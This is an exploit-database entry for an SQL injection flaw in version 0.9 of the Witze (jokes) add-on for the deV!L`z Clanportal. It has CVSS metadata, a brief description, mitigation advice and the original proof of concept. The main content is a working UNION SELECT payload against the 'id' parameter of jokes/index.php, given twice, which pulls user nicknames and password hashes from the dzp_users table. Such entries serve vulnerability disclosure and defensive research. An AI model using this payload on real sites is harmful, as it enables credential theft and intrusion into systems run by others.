header-logo
Suggest Exploit
vendor:
Witze Addon
by:
Easy Laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Witze Addon
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2012

deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability

The vulnerability exists in the jokes/index.php file, where an attacker can inject malicious SQL code into the 'id' parameter. An example of this is jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+, which can be used to extract sensitive information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : deV!L`z Clanportal Witze Addon Versions 0.9 SQL Injection Vulnerability
| # Author   : Easy Laster
| # Download : http://dzcp-zone.de/downloads/?action=show&id=97
| # Script   : Witze Addon Versions 0.9
| # Price    : free
| # Bug      : SQL Injection
| # Date     : 03.03.2012
| # Language : PHP
| # Status   : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
======================        Proof of Concept         =================================

   [+] Vulnerability
   
   jokes/index.php?action=show&id=

   [+] Injectable
   
   jokes/index.php?action=show&id=9999999999999999999999999999+union+select+1,1,nick,pwd,1,1+from+dzp_users+where+id=1--+